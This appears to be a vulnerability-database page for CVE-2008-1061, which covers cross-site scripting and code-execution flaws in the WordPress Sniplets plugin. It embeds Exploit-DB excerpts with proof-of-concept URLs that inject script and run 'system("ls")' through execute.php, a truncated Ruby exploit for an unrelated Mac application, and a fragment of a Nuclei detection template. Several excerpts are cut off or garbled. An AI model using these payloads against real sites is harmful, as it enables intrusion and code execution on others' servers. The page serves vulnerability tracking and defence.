CVE-2008-1061
published 2008-02-28CVE-2008-1061: Multiple cross-site scripting (XSS) vulnerabilities in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allow remote attackers to inject arbitrary web script…
PriorityP422medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
7.40%
93.7th percentile
Multiple cross-site scripting (XSS) vulnerabilities in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) text parameter to (a) warning.php, (b) notice.php, and (c) inset.php in view/sniplets/, and possibly (d) modules/execute.php; the (2) url parameter to (e) view/admin/submenu.php; and the (3) page parameter to (f) view/admin/pager.php.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wordpress | sniplets_plugin | — | — |
| wordpress | sniplets_plugin | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Core Image Fun House 2.0 (OSX) - Arbitrary Code Execution (PoC)
exploitdb·2008-07-11
CVE-2008-2304 Core Image Fun House 2.0 (OSX) - Arbitrary Code Execution (PoC)
Core Image Fun House 2.0 (OSX) - Arbitrary Code Execution (PoC)
---
#!/usr/bin/ruby
# Copyright (c) Netragard, LLC. [email protected]
#
# /Developer/Applications/Graphics Tools/Core Image Fun House.app
# /Contents/MacOS/Core Image Fun House
#
# (gdb) x/10s 0xbfffddf7
# 0xbfffddf7: 'Z' , "DCBA center"
#
# 2007-07-10 21:15:34.573 Core Image Fun House[1061] CFLog (0):
# CFPropertyListCreateFromXMLData(): plist parse failed;
# the data is notproper UTF-8. The file name for this data
# could be:
$
# /Users/test/Desktop/SuperTastey.funhouse/file.xml
# The parser will retry as in 10.2, but the problem should be
# corrected in the plist.
#
# \x80-\xFF range that do not form proper utf8
len = 300
fname = "SuperTastey"
retaddr = 0x0d0d0d0d # There are lots of filtered chars!
if File.exist?(fn
Exploit-DB
WordPress Plugin Sniplets 1.1.2 - Remote File Inclusion / Cross-Site Scripting / Remote Code Execution
exploitdb·2008-02-26
CVE-2008-1061 WordPress Plugin Sniplets 1.1.2 - Remote File Inclusion / Cross-Site Scripting / Remote Code Execution
WordPress Plugin Sniplets 1.1.2 - Remote File Inclusion / Cross-Site Scripting / Remote Code Execution
---
########################
Wordpress Plugin Sniplets 1.1.2 Multiple Vulnerabilities by NBBN
########################
1) Remote File Inclusion
File: /modules/syntax_highlight.php
Register Globals: ON
Vuln code:
"/>
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/admin/pager.php?page=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
3) Remote Code Execution
Register Globals: ON
Code:
'.$text;
eval ('?>'.$text);
?>
Poc:
http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/execute.php?text=%3C?php%20system(%22ls%22);
# milw0rm.com [2008-02-26]
Nuclei
WordPress Sniplets <=1.2.2 - Cross-Site Scripting
nuclei·CVSS 4.3
CVE-2008-1061 [MEDIUM] WordPress Sniplets <=1.2.2 - Cross-Site Scripting
WordPress Sniplets alert(document.domain)"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 490a004630440220445d2f4674350d150334ddd9d6cf5196c3f4764a190c83bf4db23dab2df100c002206925f9dd8d4c8cbf7f09bdcb3df7b1e61d0a85a6e6f50a119a6d5102dd65b360:922c64590222798bb761d5b6d8e72950
No writeups or analysis indexed.
http://secunia.com/advisories/29099http://securityreason.com/securityalert/3706http://www.securityfocus.com/archive/1/488734/100/0/threadedhttp://www.securityfocus.com/bid/27985https://exchange.xforce.ibmcloud.com/vulnerabilities/40830https://www.exploit-db.com/exploits/5194http://secunia.com/advisories/29099http://securityreason.com/securityalert/3706http://www.securityfocus.com/archive/1/488734/100/0/threadedhttp://www.securityfocus.com/bid/27985https://exchange.xforce.ibmcloud.com/vulnerabilities/40830https://www.exploit-db.com/exploits/5194
2008-02-28
Published